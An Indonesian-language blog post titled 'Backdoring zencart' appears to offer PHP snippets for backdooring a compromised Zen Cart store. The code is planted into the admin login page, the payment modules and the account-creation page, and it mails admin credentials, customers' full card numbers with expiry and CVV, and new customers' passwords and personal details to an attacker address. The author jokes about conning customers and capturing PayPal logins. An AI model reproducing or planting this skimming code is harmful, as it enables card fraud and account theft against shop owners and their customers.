Tuesday, December 6, 2011

Backdoring zencart

/* edit login admin /*
siapa tau admin ganti dir page login admin , kita bisa coba backdoring lagi
Code
$server = $_SERVER['SERVER_NAME'];
$referer = $_SERVER['HTTP_REFERER']; # URL page admin
$to = "yourmail@yourdomain";
$admin_name = zen_db_prepare_input($_POST['admin_name']);
$admin_pass = zen_db_prepare_input($_POST['admin_pass']);
$subject = "admin from $server";
$message = "page login = $referer \n admin = $admin_name \n pass = $admin_pass \n";
$from = "mailsender@yourdomain";
$headers = "From: $from";
mail($to,$subject,$message,$headers);
file yg di edit :
Code
http://host/[path]/[diradmin]/login.php
/* edit payment /*
pasti dah pada tau :P

Code
$firstname = $order->billing['firstname'];
$lastname = $order->billing['lastname'];
$street = $order->billing['street_address'];
$city = $order->billing['city'];
$state = $order->billing['state'];
$zip = $order->billing['postcode'];
$country = $order->billing['country']['title'];
$dayphone = $order->customer['telephone'];
$ccowner = $_POST['cc_owner'];
$ccnumber = $_POST['cc_number'];
$ccexp = $_POST['cc_expires'];
$cardtype = $_POST['cc_type'];
$cvv = $_POST['cc_cvv'];
$cemail = $order->customer['email_address'];
$server = $_SERVER['SERVER_NAME'];
$message = "\n Name: $firstname $lastname \n Address: $street \n City: $city \n State: $state \n Zip: $zip \n Country: $country \n Phone: $dayphone \n email: $cemail \n cctype: $cardtype \n ccowner: $ccowner \n cc: $ccnumber \n exp: $ccexp \n cvv: $cvv \n";

file yg di edit :
Code
http://host/[path]/includes/modules/payment/[typepayment].php
/* edit create acc /*
buat soceng customer, sapa tau ada pp nyangkut hehe :D 
Code
$nick = $_POST['nick'];
$firstname = $_POST['firstname'];
$lastname = $_POST['lastname'];
$street = $_POST['street_address'];
$company = $_POST['company'];
$suburb = $_POST['suburb'];
$city = $_POST['city'];
$state = $_POST['state'];
$zip = $_POST['postcode'];
$country = $country;
$dayphone = $_POST['telephone'];
$cemail = $_POST['email_address'];
$pwd = $_POST['password'];
$dob = $_POST['dob'];
$server = $_SERVER['SERVER_NAME'];
$message = "\n nick:$nick \n Name:$firstname $lastname \n Address:$street \n company:$company \n suburb:$suburb \n City:$city \n State:$state \n Zip:$zip \n Country:$country \n Phone:$dayphone \n email:$cemail \n password:$pwd \n DOB:$dob \n";
mail("yourmail@yourdomain","Acc From $server", "$message");

 file yg di edit :
Code
http://host/[path]/includes/modules/create_account.php
Posted by at 4:00 PM
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)
 
Cyber Attack © 2011 Templates | g0bl33h